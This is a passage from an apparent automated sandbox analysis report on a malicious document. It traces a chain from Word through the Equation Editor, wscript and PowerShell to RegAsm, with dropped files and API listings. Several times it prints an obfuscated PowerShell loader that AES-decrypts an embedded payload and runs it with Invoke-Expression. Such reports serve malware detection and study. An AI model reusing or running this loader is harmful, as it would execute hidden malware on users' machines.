vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                Suspicious powershell command line found
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CB50
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F7BED push esp; ret 2_2_008F7BEF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F49FE push esp; ret 2_2_008F4ABF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F73FC push esp; ret 2_2_008F73FF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F7BF5 push esp; ret 2_2_008F7BF7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F7E13 push esp; ret 2_2_008F7E23
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F9A2D push esp; ret 2_2_008F9A2F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F9A35 push esp; ret 2_2_008F9A37
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F714F push esp; ret 2_2_008F7213
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008E8F44 push eax; retf 2_2_008E8F61
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_002A06BD push ebx; retf 6_2_002A06CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00457106 push ecx; ret 8_2_00457119
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0045B11A push esp; ret 8_2_0045B141
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0045E54D push esi; ret 8_2_0045E556
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00457A28 push eax; ret 8_2_00457A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434E56 push ecx; ret 8_2_00434E69

                Persistence and Installation Behavior

                barindex
                Office drops RTF file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00406EB0 ShellExecuteW,URLDownloadToFileW,8_2_00406EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AA4A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CB50
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
